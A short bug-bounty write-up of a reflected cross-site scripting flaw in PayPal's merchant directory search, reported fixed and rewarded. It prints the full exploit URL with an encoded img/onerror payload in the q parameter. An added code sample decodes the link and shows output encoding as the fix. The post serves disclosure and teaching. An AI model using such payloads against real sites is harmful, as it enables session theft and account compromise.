Hello Leets,
Today I am writing about my finding on PayPal.com.
It's an XSS (Cross-Site Scripting).
The story began on 31st December 2014, when everyone was enjoying the New Year celebration and I was busy finding security bugs.
Then I tried hunting on the PayPal site.
After a lot of tries I found a pattern to inject my code and trigger the XSS bug.
So the vulnerable parameter is
q =
Vulnerable link:
===========
https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E
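The link above decoded, as an added example that is not part of the original post: it lists every `q` value the link carries and renders the last one with and without HTML encoding. The `<input>` attribute as the reflection point and all function names are assumptions; the post does not say where the value was echoed.

```javascript
// Added example, not PayPal's code. Assumption: q is echoed into a
// double-quoted HTML attribute, which is the context a leading "> breaks out of.

// The link from the write-up, copied verbatim.
const REPORTED_LINK =
  'https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E';

// Return every decoded value supplied for one parameter name.
// A repeated parameter yields several values; a filter that inspects only
// the first one never sees the others.
function allValues(link, name) {
  return new URL(link).searchParams.getAll(name);
}

// Indexes of values containing characters that are significant in HTML.
function valuesWithMarkup(values) {
  return values
    .map((v, i) => (/[<>"'&]/.test(v) ? i : -1))
    .filter((i) => i !== -1);
}

// Encode the five characters that can change HTML parsing context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Before: raw concatenation, the value can close the attribute and the tag.
function renderUnsafe(q) {
  return '<input name="q" value="' + q + '">';
}

// After: the same template with output encoding applied at the sink.
function renderSafe(q) {
  return '<input name="q" value="' + escapeHtml(q) + '">';
}

const values = allValues(REPORTED_LINK, 'q');
const last = values[values.length - 1];
console.log(values);
console.log('values with markup:', valuesWithMarkup(values));
console.log('unsafe:', renderUnsafe(last));
console.log('safe:  ', renderSafe(last));
```

Encoding at the point of output protects the page whichever of the repeated `q` values the server ends up using.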
Poc:
=====
Video Demo:
==========
The bug is fixed now, and PayPal paid me a bounty of $750.
Thanks, PayPal team.